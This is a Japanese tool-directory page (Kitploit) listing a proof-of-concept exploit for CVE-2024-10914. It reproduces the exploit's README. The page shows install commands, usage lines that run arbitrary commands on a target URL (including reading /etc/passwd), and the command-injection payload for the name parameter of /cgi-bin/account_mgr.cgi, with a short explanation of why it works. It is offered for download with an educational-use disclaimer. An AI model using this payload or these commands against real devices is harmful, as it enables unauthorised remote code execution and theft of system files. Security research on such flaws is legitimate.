Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-10914__POC — CVE-2024-10914を悪用するためのPoC | Kitploit
ツール/GitHubGitHub/0xss3k/cve-2024-10914__poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育
GitHub0xss3k/cve-2024-10914__poc

CVE-2024-10914__POC

CVE-2024-10914を悪用するためのPoC

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-10914 - 概念実証

エンドポイント /cgi-bin/account_mgr.cgi におけるコマンドインジェクション脆弱性のエクスプロイト。この脆弱性により、サニタイズされていないパラメータを介して影響を受けるシステム上で任意のコマンドを実行できます。

脆弱性の説明

CVE-2024-10914 は、Web CGI インターフェースを持つデバイスに影響を与えるコマンドインジェクションの脆弱性です。脆弱なアプリケーションは、cgi_user_add リクエスト内の name パラメータを正しく検証しないため、攻撃者がシステムコマンドを注入し、アプリケーションの権限で実行される可能性があります。

必要条件

  • Python 3.7+
  • requests ライブラリ

インストール

リポジトリをクローンして依存関係をインストールします:

root@kitploit:~
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt

または手動でインストール:

root@kitploit:~
pip install requests

使い方

スクリプトは2つの引数を提供します:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>

パラメータ

  • -u, --url (必須): ターゲットのURL (例: http://192.168.1.1)
  • -c, --command (オプション): 実行するコマンド (デフォルト: id)

例

id コマンドを実行:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1

カスタムコマンドを実行:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"

ファイル一覧を表示:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"

技術的な動作

エクスプロイトは、以下のペイロードで脆弱なエンドポイントにGETリクエストを送信します:

root@kitploit:~
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "

空の文字列が引用符で閉じられ、希望するコマンドが注入され、サーバーのコンテキストで実行されます。

応答

スクリプトは以下を表示します:

  • 接続状態
  • 送信されたペイロード
  • HTTPステータスコード
  • サーバーからの完全な応答

法的注意事項

このコードは教育およびセキュリティ研究の目的のみで提供されています。明示的な許可があるシステムでのみ使用してください。このエクスプロイトの無許可の使用は、現地の法律に違反し、犯罪を構成する可能性があります。著者は、このツールの誤用について一切の責任を負いません。

参考文献

  • CVE-2024-10914
  • CVSS Score: TBD

著者

SS3K

ライセンス

未指定

ツールをダウンロード